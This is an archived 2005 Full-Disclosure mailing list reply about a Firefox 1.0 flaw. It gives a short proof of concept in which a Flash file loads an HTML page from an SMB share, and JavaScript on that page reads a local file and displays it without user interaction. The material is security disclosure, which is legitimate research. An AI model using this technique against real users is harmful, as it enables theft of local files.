Re: [Full-Disclosure] Fireflashing [Firefox 1.0]

From: Jelmer Kuperus (jkuperus_at_planet.nl)
Date: 02/12/05

  • Next message: Yuri Gushin: "[Full-Disclosure] exim auth_spa_server() PoC exploit"
    Date: Sat, 12 Feb 2005 15:25:30 +0100
    To: mikx <mikx@mikx.de>
    
    

    I took a quick 5 minute look at this, and it looks like you can read
    arbitrary files with this without requiring any kind of user interaction.

    Just create a file called whatever.html on a windows SMB share with this
    content

    --snip--

    <script language="javascript">
        var oXML=new XMLHttpRequest();
        oXML.open("GET","file:///C:/jelmer.txt",false);
        oXML.send(null);
        alert(oXML.responseText);
    </script>

    --snip--

    Now create a flash file that opens file://///SOME_IP/SHARENAME/whatever.html
    (I just created an empty flash file with a single action that contained
    the following line of actionscript : getURL
    ("file://///SOME_IP/SHARENAME/whatever.html", "_self"); )
    and presto it will display the contents of c:\jelmer.txt

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html


  • Next message: Yuri Gushin: "[Full-Disclosure] exim auth_spa_server() PoC exploit"

    Relevant Pages